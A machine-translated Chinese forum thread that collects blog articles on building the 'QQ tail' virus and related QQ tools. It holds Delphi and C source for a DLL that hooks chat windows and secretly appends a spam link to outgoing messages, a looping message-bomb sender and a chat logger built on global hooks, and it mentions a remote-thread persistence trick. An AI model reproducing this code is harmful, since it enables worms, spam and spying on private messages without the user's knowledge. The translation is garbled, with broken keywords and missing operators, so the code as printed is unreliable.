The only thing to explain here is LPARAM> = 0 clause. Obviously this IF judgment is in judging the input of the hotkey Ctrl Enter, then lparam> = 0 is it? In fact, among the callback of the keyboard hook, LPARAM is a very important parameter that contains information on the repetition of the keystroke, scanning code, extension key mark, etc. The highest bit of LPARAM (0x80000000) indicates whether the current button is pressed. If this bit is being pressed, this bit is 0, and the opposite is 1. So lParam> = 0 means calling pastetext when WM_KeyDown, means that if the condition is removed, the PASTETEXT will call twice (one along with WM_Keyup).
Mounted hooks and lookup windows
The next step is how to mount these two hooks. For hook hooks, the problem to be solved is: Where do you hook a hook, and how to hook?
The goal of hook the hook is definitely the thread of the QQ "Send Information" window. My code is to pass the handle of this window to hook the hook:
// Mounting the hook
Bool WinAPI STHOK (HWND HQQ)
{
BOOL BRET = FALSE;
IF (hqq! = null)
{
DWORD DWTHREADID = GetWindowThreadProcessID (HQQ, NULL);
/ / Thank you for your finding code, save the trouble I use SPY
g_hrich = getWindow (Getdlgitem (HQQ, 0), GW_CHILD);
IF (g_hrich == null)
Return False;
// Mounting the hook
g_hproc = setwindowshookex (wh_callwndproc, callwndproc, g_hinstdll, dwthreadid);
g_hkey = setwindowshookex (wh_keyboard, keyboardproc, g_hinstdll, dwthreadid);
Bret = (g_hproc! = null) && (g_hKey! = null);
}
Else
{
// Uninstall the hook
Bret = UnHookWindowsHookex (g_hproc) && unhookwindowshookex (g_hkey);
g_hproc = NULL;
g_hKey = null;
g_hrich = NULL;
}
Return Bret;
}
To this end, all the above code is located in the dynamic link library of hook.dll, and I will not introduce the DLL, please refer to the relevant information on the MSDN and the supporting source code of this article.
All important work is already made in the DLL (in fact this part of the work can only be done by the DLL, which is determined by the Windows virtual memory mechanism), we only need to call the exported Sthook function in EXE. . So, how do the parameters of SETHOOK? Please see the following code:
/ / Thank you for your finding code, save the trouble I use SPY
Hwnd hsend;
G_HQQ = NULL;
SetHOOK (NULL);
DO
{
G_HQQ = FindWindowEx (NULL, G_HQQ, "# 32770", null); hsend = findwindowex (G_HQQ, NULL, "Button", "Send (& S)");
} while (g_hqq! = null && hsend == NULL);
IF (g_hqq! = null)
SETHOK (G_HQQ);
The DO-WHILE loop in this code is used to find the "send message" window, the confidentiality of the QQ window is getting stronger and stronger, one layer of the window is set, it is very inconvenient, so thank you for your friend Hottey. "QQ message bomb, I have the article", I will use Spy trouble. What I did, just translated Delphi code in his text into C code.
DLL sharing data segment
If you don't know much about the DLL, then after you read my supporting source code, you will definitely have some questions about the following code:
// Define the shared data segment
#pragma data_seg ("Shared")
HHOOK G_HPROC = NULL; // Window Process Hook Handle
HHOOK G_HKEY = NULL; / / Keyboard hook handle
HWnd g_hrich = null; // Text box handle
#pragma data_seg ()
#pragma Comment (Linker, "/ Section: Shared, RWS")
This defines a segment of the shared data, because my comment has been written very clearly, then what role does the shared data segment? Before answering this question, I invite you to comment out of the pre-processing instruction instruction in the code and then recompile this DLL and run, what do you find?
Yes, add a tail failed!
Ok, let me explain this question. The exe, DLL and QQ of this simulation program are actually the following relationship:
This DLL needs to map an instance to the address space of the EXE for its call, but also need to map another instance to the QQ address space to complete the work of the hook. That is, after the hook is hooked, there are two DLL instances in the module of the entire system! This DLL is non-He DLL, so there is no connection between them. Take the global variable g_hrich, the DLL on the left of the figure has obtained the handle of the text box through the incoming of EXE, however if there is no shared section, then in the right DLL, g_hrich is still NULL. The meaning of sharing section is reflected in this, which is to ensure the connection between EXE, DLL and QQ. This is a bit similar to the member variables of Static in C .
After the hook is successful, you can find a look at the process manager with a module view function, and you will find that hook.dll is also located in the module of QQ.EXE.
The last thing I want to say
1, I said before, in January 2003, I met this virus. I still know that the virus EXE is only 16kb size, so from the nature of the virus itself, this thing should be Writing with Win32ASM will be more practical.
2, that virus I used to be a hand-killing - I used a process to see the tool. But the "QQ Tail" has increased the resurrection function - After the EXE is killed, the DLL will wake up. I used my process to see tool analysis, and I found that almost all processes in the system were hanged by the virus's DLL. This technology is to use CreateRemoteThread in all processes to insert an additional resurrection thread, which is really a stone two bird - guarantees that EXE is always running, and this DLL is in use cannot be deleted. This technology I have already achieved, but the stability is far from being excellent in the virus itself, so it is not written here, interested friends can refer to the relevant chapter of Jeffrey Richter "Windows Core Programming". 3, the pen, I remembered a word in the "STL source analysis" in the "STL source profiling" - "The source code has no secret." If you have this feeling after reading this article, then I will feel lucky.
Click here to download supporting source code
Author blog: http://blog.9cbs.net/titilima/
delete
#
Reply: QQ information
2004-10-20 2:47 PM
Bing314
http://dev.9cbs.net/develop/Article/22/22661.shtm
Title Making QQ Message Bomb Select from Hottey Blog
Keyword QQ
Somewhere
QQ chat robot
Original: Hottey
A few days ago, I saw an article on developing QQ chat robots on the magazine. When I talked about the content of the QQ cycle, I feel very fun, so I started the road of Delphi and started my QQ chat robot.
First of all, we must understand what you have to do. Everyone has used QQ, know the whole process of sending messages to others! The function to achieve loop sending messages should have the following conditions:
1. Must be done in chat mode. This is still present after the message is sent, and the QQ form also exists.
2. Second, it is to find the handle of the QQ text form.
3. Post you want to say to the QQ text form. Then click on the send button yourself.
The idea is very simple, then we will start to implement it.
First click on the handle of the QQ text form. At this time, I used SPY to view QQ form. The result is as follows: This way is coming out. To find the handle of the QQ text form, you have to find its parent class: The flag is 00620252 Class Name: AFXWND42 Control ID: 00000000. To find it, you must find the QQ message dialog box,.
Use several API functions at this time:
1.FindWindowEx (
HWND1: long, // In these parent windows, if set to 0, indicating that using the desktop window (usually the top window is considered a sub-window of the desktop)
HWND2: long, // Start looking up after this window. Such as 0, indicating that the first sub-window starts searching.
LPSZ1: String, // To search for class name, 0 means ignored.
LPSZ2: String // Class name to search, 0 is ignored.
);
2.Getwindow
HWnd: long, // Source window.
WCMD: long // Specifies the relationship between the result window and the source window (here GW_CHILD) represents the first sub-window for the source window.
);
3. Getdlgitem
HWND: long, // The handle of the source window.
INT: Niddlgitem / / I want to find the ID number of the window
);
In fact, when I first started looking for a QQ dialog window, I first thought of findwindow (). This function can look for the form handle directly through the window title name.
I am looking for:
Var hParent: hwnd;
HParent: = FindWindow (NIL, 'Sending Information'); // This is still very effective in 2003, but it is an error. Why?
Later, I found out that the title of each QQ2003 was changed: as the figure above: Cold as a meal - send a message, if you send a message to a person, it will become: blue wind - send message (for example ).
This may be a security measures taken by QQ2003! Ha ha! You may see the tools for sending a message bomb on the Internet sometimes to enter the other party's nickname. (Easy to get a form handle through the nickname).
But have there be a better way! Have! It is necessary to use findwindowex (). Take a closer look at its parameters, the key is the second hwnd2 - we can call FindWindowEx to find the eligible sub-window by it. The following is my code:
Var hParent: hwnd; // Defined as global variables. To record the handle of the form found after the FindWindowEx () each time you call.
Procedure TFORM1.FormCreate (Sender: TOBJECT);
Begin
HParent: = 0; // Initialization, find all the top window of the desktop start.
END;
Procedure TFORM1.TIMER1TIMER (Sender: TOBJECT);
Var hbutton, hbutton1: hwnd;
Begin
Repeat
HParent: = FindWindowEx (0, HParent, '# 32770', nil); // QQ dialog class is # 32770, so that the cycle calls FindWindowEx () can update the value of HParent each time the clock is effective. Find a form that meets the requirements after the HParent form is available.
HButton: = FindWindowEx (HParent, 0, NIL, 'Send (& S)'); // Determine the handle of the found window to see if the 'Send (& S)' button exists in this form. The existence has found the correct QQ dialog.
Until HButton <> 0; // Find the QQ dialog and jump out of the loop.
HButton1: = FindWindowEx (HParent, 0, NIL, 'chat mode (& T)'); // After finding the QQ dialog, look up the chat mode button handle.
If HBUTTON1 <> 0 THEN // If there is a chat mode button now, the QQ form is in the message mode status.
SendMessage (HButton1, BM_Click, 0, 0); // Send a click message to the chat mode button. Convert the form to chat mode.
END;
This way we will successfully find the QQ dialog box. And the Successful Setup dialog is a chat mode. The task is finally completed first, huh, huh! More depressed, I am still behind.
Then, start the handle of the form of the QQ input text. At this time, Getdlgitem () Everyone knows that a control ID of a type of control in a form is constant in this form class (removed some static cultural somewhere) over SPY I know the window of QQ input text. The body's Control ID is 0000037E. So I wrote the following statement.
Var hmemo: hwnd;
HMEMO: = Getdlgitem (HParent, $ 0000037E);
As a result, it was found that there was no effect that the stuff did not have its own expectations. Ha ha! Still pick up SPY, ha! It is found that there is more than one control ID to 0000037E. And we want to get the location of the form of QQ input text is not the forefather (if the forefather, the above statement is also available ^ _ ^). Depressed is not. No way, start with its parent class! Can not be obtained in one step. Take a closer look. Find it! The logo is 00620252 Class Name: AFXWND42 Control ID: 00000000 is the parent class of the form of QQ input text, and it is all of the first Class Name: AfxWnd42. So we can find its handle. I can't run. With it, the handle of the form of QQ input text is very easy to find, haha! The following is my code:
Var hmemo, hmemo1: hwnd;
HMEMO = Getdlgitem (HParent, $ 00000000); // Find the parent class.
HMEMO1 = getWindow (HMEMO1, GW_CHILD); // Get the first sub-window handle under the parent class (HMEMO1 即 QQ input text, the handle of the form of the text, "
By the way, talking with getWindow () usage:
GetWindow
HWND: long, // Source window handle.
Wcnd: long // Specifies the relationship between the result window and the source window. (GW_CHILD is the first sub-window handle under the source form)
)
More constant relationships You go to view msdn! You don't have to take up the space of the cold spring. what!
At this point, we have already got this, the handle of the QQ dialog and QQ input text window, the following steps are the words you want to write, please enter the QQ into the text window, click to send, you will depressed others!
I have applied my code now for your reference:
Procedure TFORM1.FormCreate (Sender: TOBJECT);
Begin
I: = 0;
// Import the file content to the ComboBox control.
ComboBox1.Items.LoadFromFile (applfilepath (application.exename) 'text.txt');
ComboBOX1.Text: = ComboBox1.Items.Strings [0];
END;
Procedure TFORM1.TIMER1TIMER (Sender: TOBJECT);
Var hmemo1: hwnd; // hmemo1 is found to find QQ text input box handle
Begin
If CheckBox1.checked the // Click the loop Send check box.
Begin
IF I> ComboBox1.Items.count-1 Then
I: = 0;
Edit1.Text: = ComboBox1.Items.Strings [i];
Edit1.SelectAll;
Edit1.copytoclipboard; // Copy to the shear board
SendMessage (HMEMO1, WM_PASTE, 0, 0); // Send a paste message for QQ input text form.
SendMessage (HButton, BM_Click, 0, 0); // Click Send button
i: = i 1;
END;
If CheckBox1.checked = false then // No Cycurse Send check box.
Begin
Edit1.Text: = Combobox1.text;
Edit1.SelectAll;
Edit1.copytoclipboard;
SendMessage (HMEMO1, WM_PASTE, 0, 0);
SendMessage (HButton, BM_Click, 0, 0); END;
END;
Attach a brief description: Because I know limited, I don't know how to copy the known string to the shear board with the shear board function. So you can only borrow on the control. Because all text classes have a method, it is -edit1.copytoclipboard, so you can only turn Edit1 to an invisible control. Each time you will pass the content you want to send to Edit1, follow the contents of Edit1 CopyToClipboard. what! This is just a way to take a way. If you know what a better way, I hope to tell it, huh!
postscript:
The above code is for the QQ2003 version. Although there is a good tool for wavering thousands of capping. But as a small rookie. But I like to be programmed. One of yourself DIY (Do It Youtseelf) is also a very cool thing! I also referred to the waver of the waves, I feel that it has its function! not bad. In fact, there is not much technical things, just use a few API functions. I only hope that my friends who have just learned Delphi have been helped. Of course, the master can not use it.
Note: QQ2004 has some changes. In order to facilitate my new code post:
Procedure TFORM1.TIMER1TIMER (Sender: TOBJECT);
Var hbutton, hbutton1, hmemo, hmemo1, hparent1: hwnd;
Begin
Repeat
HParent: = FindWindowEx (0, Hparent, '# 32770', nil);
// qq2004 is more than the following sentence, more layers on MEMO
Hparent1: = FindWindowEx (HParent, 0, '# 32770', nil);
Until Hparent1 <> 0;
HButton: = FindWindowEx (Hparent1, 0, NIL, 'Send (& S)');
HButton1: = FindWindowEx (Hparent1,0, NIL, 'chat mode (& T)');
IF hbutton1 <> 0 THEN
SendMessage (Hbutton1, BM_Click, 0, 0);
HMEMO1: = Getdlgitem (HParent1, $ 000000);
HMEMO: = getWindow (HMEMO1, GW_CHILD);
IF HMEMO <> 0 THEN
Begin
if CheckBox1.checked Then
Begin
IF I> ComboBox1.Items.count-1 Then
I: = 0;
Edit1.Text: = ComboBox1.Items.Strings [i];
Edit1.SelectAll;
Edit1.copytoclipboard;
SendMessage (HMEMO, WM_SETTEXT, 0, 0);
SendMessage (HMEMO, WM_PASTE, 0, 0);
SendMessage (Hbutton, BM_Click, 0, 0);
i: = i 1;
END;
if CheckBox1.checked = false
Begin
Edit1.Text: = Combobox1.text;
Edit1.SelectAll;
Edit1.copytoclipboard;
SendMessage (HMEMO, WM_SETTEXT, 0, 0);
SendMessage (HMEMO, WM_PASTE, 0, 0);
SendMessage (Hbutton, BM_Click, 0, 0);
END;
END;
END;
If you have a friend, please go to my website to download (in my work): Author website: http://asp.itdrp.com/hottey
Hottey modified in 2004-5-30
Author Blog: http://blog.9cbs.net/Hottey/
delete
#
Reply: QQ information
2004-10-20 2:58 PM
Bing314
http://dev.9cbs.net/develop/Article/22/22273.shtm
Another implementation of the title QQ tail virus Select from Myling Blog
Keyword QQ tail virus
Somewhere
I saw that Wuqiu brother on a few days ago, I simulated the QQ tail virus.
I think it is not very common by finding the form header.
Go back with spy to view it, the original, QQ framework is like this
Among them, # 32770 (dialog box) is the pop-up QQ chat interface; the internal control is as shown in the figure above, there is Static (label), buttton, AfxWnd42 (this I guess like Panel containers), Richedit (this The inside is to show our chat record)
The specific layout is not a thin saying, you can open Spy to see it, at a glance
Among them, we use only two controls, as shown below:
The first half is the handle, the middle is the title, the second half is the name
Such as: 05240258 ~ Send (& S) ~ Button
Is the send button, the handle is 05240258
Ok, I know these, I am very simple to do something.
All code is as follows:
Procedure TFORM1.TIMER1TIMER (Sender: TOBJECT);
VAR
HMEMO, HRICHEDIT, HWINDOW, HBUTTON: THANDLE; // Handle Variable
Sztext: Array [0..255] of char; // getting the string
MyText: string; // Send string
Begin
HWindow: = 0; // Start from zero, start traversing from the first word window
While True DO
Begin
// Find the form of # 32770 (dialog)
Hwindow: = FindWindowex (0, Hwindow, '# 32770', nil);
IF hwindow <> 0 THEN
Begin
// Find the form of AfxWnd42 (this I guess like a container of Panel)
HMEMO: = FindWindowEx (Hwindow, 0, 'AfxWnd42', NIL);
IF HMEMO <> 0 THEN
Begin
// Find the form of richedit
HrichEdit: = FindWindowEx (HMEMO, 0, 'Richedit', NIL);
IF HRICHEDIT <> 0 THEN
Begin
// What is it casual, 嘿嘿
Mytext: = 'Ade is a big handsome guy, 嘿嘿';
// Send a message to get the text in QQ
SendMessage (HrichEdit, WM_Gettext, 256,
Integer (@sztext [0]));
// Plus yourself
Mytext: = sztext mytext;
// Send it to QQ
SendMessage (HrichEdit, WM_SETTEXT, 256,
Integer (MyText);
/ / Find the send button
Hbutton: = FindWindowEx (hwindow, 0, 'button ",
'Send (& S)');
// Send a click message, send
SendMessage (HButton, BM_Click, 0, 0);
// Exit, if you remove this sentence, you will give all the open QQ forms.
/ / Otherwise, only the front QQ form
Break;
END;
END;
END;
END;
END;
This is just a guess for the QQ tail, there are many places that don't have any satisfactory, such as the text displayed in QQ and then send it, just as long as the news is intercepted, Then secretly send it back, and you will not know that ghosts don't feel.
Author blog: http://blog.9cbs.net/myling/
delete
#
Reply: QQ information
2004-10-20 3:41 PM
Bing314
http://dev.9cbs.net/develop/Article/22/Article/28/28554.shtm
Title QQ Chat Recorder Demo Select BLOG from Hottey
Keyword QQ, hook, DLL
Somewhere
QQ chat logger demo (can be for QQ2003 and QQ2004 versions)
Note: This article does not have the content needed (because the technology in this article is not new, just some simple implementation), you can use this, if you waste precious time, I will be deeply unrest.
Author's website: http://asp.itdrp.com/hottey ---------------- Hottey
Hey! It's hard to have a little easier. Now I have time to send the QQ chat recorder made in the previous day and share it with everyone. Do this program is to see the latest online software called QQAUTOREORDER. It The implementation is to record QQ chat records. The technique used is: hook the QQ dialog. It does not record the QQ message that the user has not clicked. (I think if you want to record QQ messages, Meaning It is an unequal QQ message box to record the message of QQ. I can only go to block the QQ data package. I spent a day above this, but the final conclusion is '太 无 力 力' ^ _ _ ^ It seems that the QQ data package is not so easy to get L)
Reason returning: This article uses a method for hook the QQ message box (which is easier to implement, two is also a general way to most such programs.) For the simplified program: I divide this procedure into two implementations (all in QQ2004 Realize, to the last version compatible with QQ2003):
I. Capture someone else giving yourself:
Since it is a message box of QQ, naturally, it is natural to find a very reasonable and most convenient. It is easy to think about what you use to view QQ messages. Generally lead to a QQ message window The generation of body. It will produce a CREATE event. From this point, it is wise to use a wh_shell hook.
The description of the WH_SHELL is: monitor the Windows shell notification message, such as the release of the creation of the top-level window. We must care about the creation message of the window.
Because there is a case where multiple QQ message windows appear once, I use global hooks here: and define the following data structure:
HookType.Pas unit
Unit hooktype;
Interface
Uses
Windows, Messages;
Const
WM_USERCMD = WM_APP 1; // User Customize Application Level Message
UC_Wincreate = WM_APP 2; // QQ message window creation
UC_Windestroy = WM_APP 3; // Send QQ message
Buffer_size = 16 * 1024;
Hook_mem_filename = 'MEM_FILE';
Type
Tshared = Record
Keyhook: hhook; // Keyboard hook
Shellhook: hhook; callhook: hhook;
Mainwnd: thandle; // Handle (non-Application.handle)
Moudle: Thandle; // DLL
END;
Pshared = ^ Tshared;
IMPLEMentation
End.
DLL unit code
VAR
Memfile: thandle;
Shared: pshared;
Function shellProc (icode: integer; wparam: wparam; lparam: lparam): LRESULT; stdcall;
Begin
Case icode of
Hshell_windowcreated:
// Send yourself to the demo to define the message WM_USERCMD. WPARAMR parameter description
// wparam specifies the handle of the window being created or destroyed, respective.
Postmessage (Shared ^ .mainWnd, WM_USERCMD, UC_WINCREATE, WPARAM);
END;
Result: = CallnexthooKex (Shared ^ .shellhook, iCode, WPARAM, LPARAM);
END;
Function Installhook: boolean;
Begin
Shared ^ .moudle: = getModuleHandle (Pchar ('QQHOOK')); // qqhook is my DLL file name.
Shared ^ .Shellhook: = setWindowshookex (wh_shell,
@ShellProc,
Shared ^ .moudle,
0);
if Shared ^ .ShellHook = 0 THEN
Begin
Result: = FALSE;
EXIT;
END;
RESULT: = TRUE;
END;
{Undo hook filter function}
Function uninstallhook: boolean;
Begin
Freelibrary (Shared ^ .moudle);
Result: = UnHookWindowsHookex (Shared ^ .shellhook);
UnmapViewoffile (Shared);
CloseHandle (Memfile);
END;
Procedure DLlentry (dwreason: integer);
Begin
Case dwreason
DLL_PROCESS_ATTACH:
Begin
Memfile: = OpenFilemapping (file_map_write, false, hook_mem_filename);
if Memfile = 0 THEN
Memfile: = CREATEFILEMAPPING ($ fffffff, nil,
Page_readwrite,
0,
Sizeof (tshared),
Hook_mem_filename);
Shared: = MapViewOffile (Memfile,
FILE_MAP_WRITE,
0,
0,
0);
END;
DLL_PROCESS_DETACH:
Begin
// uninstallhook;
END;
Else;
END;
END;
Exports
INSTALLHOOK;
Begin
DllProc: = @dllentry;
DLLENTRY (DLL_PROCESS_ATTACH);
End.
// The above code does not have a more manner to unload the hook, which is not discussed in this range.
Demo program code
Procedure TFORM1.BUTTON1CLICK (Sender: TOBJECT); Begin
INSTALLHOOK;
END;
Procedure TFORM1.FormCreate (Sender: TOBJECT);
Begin
Memfile: = OpenFilemapping (file_map_write, false, hook_mem_filename);
if Memfile = 0 THEN
Memfile: = CREATEFILEMAPPING ($ fffffff, nil,
Page_readwrite,
0,
Sizeof (tshared),
Hook_mem_filename);
Shared: = MapViewOffile (Memfile,
FILE_MAP_WRITE,
0,
0,
0);
Shared ^ .mainWnd: = handle; // Save Form Handle
END;
// Window message processing process
Procedure TFORM1.WNDPROC (VAR Msg: TMESSAGE);
Begin
With msg do
Begin
IF msg = wm_usercmd life // DLL sent custom message
Begin
Case wparam of
UC_Wincreate: // QQ message box creation
Begin
GetText (FindHWD (HWnd (LPARAM))); // Get the text in the QQ message box
END;
END;
END;
END;
inherited;
END;
/ / Find the QQ window handle via the wPARAM parameter
Function TFORM1.FINDHWD (PARENT: HWND): hwnd;
VAR
HWD, HBTN, HMEMO: HWND;
Begin
Result: = 0;
HWD: = FindWindowEx (PARENT, 0, '# 32770', nil); // qq secondary window handle QQ2003 and previous versions do not have this.
IF (hwd <> 0) THEN
Begin
HBTN: = FindWindowEx (hwd, 0, nil, 'back message (& r)'); // can be proved to be a received QQ message box.
IF (HBTN <> 0) THEN
Begin
HMEMO: = Getdlgitem (HWD, $ 00000380); // Richedit handle, QQ message exists here.
IF (HMEMO <> 0) THEN
Result: = HMEMO;
END;
END;
END;
/ / Get the text in the specified handle control.
Procedure TFORM1.Gettext (hwd: hwnd);
VAR
RET: longint;
QQText: pchar;
BUF: Integer;
Begin
GetMem (QQTEXT, 1024);
IF (hwd <> 0) THEN
Begin
Try
RET: = SendMessage (HWD, WM_GettextLength, 0, 0) 1;
BUF: = longint (QQText);
SendMessage (HWD, WM_Gettext, Min (RET, 1024), BUF);
Memo1.Lines.Add (QQText); // Display text in MEMO
Finally
FreeMem (QQText, 1024);
END;
END;
END;
The above is the code I test, just for the convenience of classification, I will come out. Maybe there is some unreasonable place. If there is anything out of this, the following will provide full code download.
Hottey on 2005-6-2 website: http://asp.itdrp.com/hottey
Author blog: http://blog.9cbs.net/hottey/ Delete
#
Reply: QQ information
2004-10-20 3:42 PM
Bing314
Http://dev.9cbs.net/develop/Article/22/Article/28/28576.shtm
Title QQ Chat Recorder Demo (2) Select Blog from Hottey
Keyword QQ, hook, DLL
Somewhere
Based on the article, this article will tell how to capture the news from yourself:
// hottey from 2004-6-2
QQ issues a message from this unit is nothing more than two ways. (1) Press the send button, (2) Press the Ctrl Enter key button. Of course, the custom keys are except for this article:
Based on these two ways I choose: wh_callwndproc and wh_keyboard two hooks. Sorry, today's mood is too bad (some trivial things in school). It is really no heart. You can also put the source code. Everyone is interested ourselves. ... What is the problem? Can contact me. Delphi21 @ 163.com
/ / Monitor Ctrl Enter Competence
Function KeyboardProc (ICODE: INTEGER; WPARAM: WPARAM; LPARAM: LPARAM): LRESULT; STDCALL
Begin
IF (wparam = vk_return) and (getKeyState (vk_control) <0) and (lparam> = 0) THEN
Begin
SendMessage (Shared ^ .mainwnd, WM_USERCMD, UC_Windestroy, GetForeGroup);
END;
Result: = CallNexthooKex (Shared ^ .Keyhook, Icode, WPARAM, LPARAM);
END;
/ / Monitor "Send" button
Function CallWndProc (Icode: wparam; lparam: lparam): LRESULT; stdcall;
Type
MSG = ^ cwpstruct;
VAR
p: msg;
Begin
p: = msg (lparam);
// Only processed the front desk window
IF (p ^ .Message = WM_COMMAND) AND (loword (p ^ .wparam) = 1) THEN
Begin
SendMessage (Shared ^ .mainwnd, WM_USERCMD, UC_Windestroy, GetForeGroup);
END;
Result: = CallNexthookex (Shared ^ .callhook, iCode, WPARAM, LPARAM);
END;
Demo program related code:
Procedure TFORM1.WNDPROC (VAR Msg: TMESSAGE);
Begin
With msg do
Begin
IF msg = WM_USERCMD THEN
Begin
Case wparam of
UC_Windestroy:
Begin
GetText (FindHWD (HWnd (lparam)));
END;
END;
END;
END;
inherited;
END;
Function TFORM1.FINDHWD (PARENT: HWND): hwnd;
VAR
HWD, HBTN, HMEMO: HWND;
Begin
HWD: = FindWindowEx (PARENT, 0, '# 32770', nil);
Result: = 0;
IF (Parent <> 0) THEN
Begin
HBTN: = FindWindowEx (HWD, 0, NIL, 'Send (& S)'); if (HBTN <> 0) THEN
Begin
HMEMO: = Getdlgitem (HWD, $ 000000);
IF (HMEMO <> 0) THEN
Begin
Result: = getWindow (HMEMO, GW_CHILD);
END;
END;
END;
END;
Procedure TFORM1.Gettext (hwd: hwnd);
VAR
RET: longint;
QQText: pchar;
BUF: Integer;
Begin
GetMem (QQTEXT, 1024);
IF (hwd <> 0) THEN
Begin
Try
RET: = SendMessage (HWD, WM_GettextLength, 0, 0) 1;
BUF: = longint (QQText);
SendMessage (HWD, WM_Gettext, Min (RET, 1024), BUF);
Memo1.Lines.Add (QQText);
Finally
FreeMem (QQText, 1024);
END;
END;
END;
The figure after the complete program is running:
If there is any problem:
Please ask on http://asp.itdrp.com/hottey. (And there is a source download)
Author Blog: http://blog.9cbs.net/Hottey/
delete
#
Reply: QQ information
2004-10-20 3:48 PM
Bing314
Implementation of "QQ Tail Virus" core technology blog
http://blog.9cbs.net/titilima/archive/2004/02/09/21451.aspx
delete
#
Reply: QQ information
2004-10-20 3:54 PM
Bing314
http://home.nuc.edu.cn/~titilima/readArticle.php?id=23
delete
#
Reply: QQ information
2004-10-21 8:38 AM
Bing314
http://dev.9cbs.net/develop/Article/21/21715.shtm
Title QQ Tail Virus Send Principle Analysis Selection from Wuqiu's Blog
Keyword QQ tail
Somewhere
Analysis of Sending Principle of QQ Tail Virus
Recently, the QQ tail virus is on the attack. I also often received the news of the tail sent by the netizens, so I'm curious, I also study the principle of studying this virus. First of all, I don't know the true principle of QQ tail virus, I just guess and write a similar program to implement it.
QQ tail: When the user opens a QQ message Send a window, the virus will automatically enter text in the message text box, and then send it out if the user reacts.
Program Implementation: First, you should find the handle of the QQ message send window and the window handle of the message text box and the "Send" button.
First, how to find QQ messages send window handle:
There are two kinds of QQ messages, one is a message mode. In this case, the window title contains the words "send message"; one is a chat mode, and the window title contains the words "chat";
You can find the corresponding handle by enumerating the window:
// Get the send message window of QQ
Function getQqwnd: hwnd; var
HcurrentWindow: hwnd;
WNDTEXT: STRING;
Begin
HcurrentWindow: = getWindow (Application.handle, GW_HWndFirst);
While HcurrentWindow <> 0 DO
Begin
WNDTEXT: = GetWndText (HcurrentWindow);
IF (POS ('chat ", wndtext)> 0) or (POS (POS (' Send Message ', WNDTEXT)> 0) THEN
Begin
Result: = HcURRENTWINDOW;
EXIT;
END;
HcurrentWindow: = getWindow (HcurrentWindow, GW_HWndNext);
END;
Result: = 0;
END;
Second, how to find the "Send" button handle:
After finding the QQ send message window, you can find the "Send" button handle. If the window handle is QQWnd, you can use a loop to find the text containing the "Send" window. After the experiment, "Send" The button is precisely the first child window of the form, so that you can use
btnwnd: = getdlgitem (QQWnd, 1); // Send button
To get the handle of the "Send" button.
Third, how to find the message text box window handle:
The message text box is not easy to find, but you can enter a few letters in the message text box, such as "abcd", so we can use the above method to find it, but after experiment, the message text box is not QQ The direct sub-window of the window, but a child window of one of the sub-windows, through experiments, you can use
TXTWND: = GetWindow (Getdlgitem (QQWND, 0), GW_CHILD); // Text Box
Come.
Fourth, how to get the text of the original message text:
To get the text of the original message text box, only one API function is required, as follows:
// get window text
Function getWndtext (hwnd: hwnd): String;
VAR
RET: longint;
MTEXT: PCHAR;
BUF: Integer;
Begin
RET: = SendMessage (HWND, WM_GETTEXTLENGTH, 0, 0) 1;
GetMem (mtext, reing);
Try
BUF: = longint (mtext);
SendMessage (HWND, WM_GETTEXT, RET, BUF);
Result: = STRPAS (MTEXT);
Finally
FreeMem (mText, Ret);
END;
END;
5. How to live in the original message text box:
Contrary to the text
// Send text to the window
Procedure setWndtext (hwnd: hwnd; text: string);
VAR
RET: longint;
MTEXT: PCHAR;
BUF: Integer;
Begin
GetMem (MTEXT, Length (Text));
Stropy (mtext, pchar (text));
Try
BUF: = longint (mtext);
SendMessage (HWND, WM_SETTEXT, 0, BUF);
Finally
FreeMem (MTEXT, Length (Text));
END;
END;
6. If you let the "send" button automatically click: Everything is ready, now you want to start sending, in order to send the message automatically, we can simulate the "Send" button is clicked.
SendMessage (btnwnd, wm_lbuttondown, mk_lbutton, 0);
SendMessage (btnwnd, wm_lbuttonup, 0,0);
The click send function is implemented by simulating a mouse button on the "Start" button.
7. The other timing functions are relatively simple, and there is not much more here.
Eight, all the source code is as follows:
Unit unit1;
Interface
Uses
Windows, Messages, Sysutils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, Stdctrls, ExtCtrls;
Type
TFORM1 = Class (TFORM)
Timer1: TTIMER;
Button1: tbutton;
EDIT1: TEDIT;
Label1: TLABEL;
Button2: tbutton;
Procedure Timer1Timer (Sender: TOBJECT);
Procedure Button1Click (Sender: TOBJECT);
Procedure Button2Click (Sender: TOBJECT);
Private
{Private Declarations}
public
{Public declarations}
END;
VAR
FORM1: TFORM1;
IMPLEMentation
{$ R * .dfm}
// get window text
Function getWndtext (hwnd: hwnd): String;
VAR
RET: longint;
MTEXT: PCHAR;
BUF: Integer;
Begin
RET: = SendMessage (HWND, WM_GETTEXTLENGTH, 0, 0) 1;
GetMem (mtext, reing);
Try
BUF: = longint (mtext);
SendMessage (HWND, WM_GETTEXT, RET, BUF);
Result: = STRPAS (MTEXT);
Finally
FreeMem (mText, Ret);
END;
END;
// Send text to the window
Procedure setWndtext (hwnd: hwnd; text: string);
VAR
RET: longint;
MTEXT: PCHAR;
BUF: Integer;
Begin
GetMem (MTEXT, Length (Text));
Stropy (mtext, pchar (text));
Try
BUF: = longint (mtext);
SendMessage (HWND, WM_SETTEXT, 0, BUF);
Finally
FreeMem (MTEXT, Length (Text));
END;
END;
// Get the send message window of QQ
Function getqqwnd: hwnd;
VAR
HcurrentWindow: hwnd;
WNDTEXT: STRING;
Begin
HcurrentWindow: = getWindow (Application.handle, GW_HWndFirst);
While HcurrentWindow <> 0 DO
Begin
WNDTEXT: = GetWndText (HcurrentWindow);
IF (POS ('chat ", wndtext)> 0) or (POS (POS (' Send Message ', WNDTEXT)> 0) THEN
Begin
Result: = HcURRENTWINDOW;
END;
HcurrentWindow: = getWindow (HcurrentWindow, GW_HWndNext);
END;
Result: = 0;
END;
/ / Timed processing
Procedure TimerProc;
VAR
Qqwnd, txtwnd, btnwnd: hwnd;
Msg: String;
Begin
qqwnd: = getqqwnd;
IF Qqwnd = 0.
btnwnd: = getdlgitem (QQWnd, 1); // Send button
TXTWND: = GetWindow (Getdlgitem (QQWND, 0), GW_CHILD); // Text Box
IF (btnwnd = 0) or (txtWnd = 0).
Msg: = getWndText (txtwnd);
Msg: = msg # 13 # 10 'Welcome to the green network http://www.lvyin.net';
SetWndText (TXTWND, MSG);
SendMessage (btnwnd, wm_lbuttondown, mk_lbutton, 0);
SendMessage (btnwnd, wm_lbuttonup, 0,0);
END;
Procedure TFORM1.TIMER1TIMER (Sender: TOBJECT);
Begin
TimerProc;
END;
Procedure TFORM1.BUTTON1CLICK (Sender: TOBJECT);
Begin
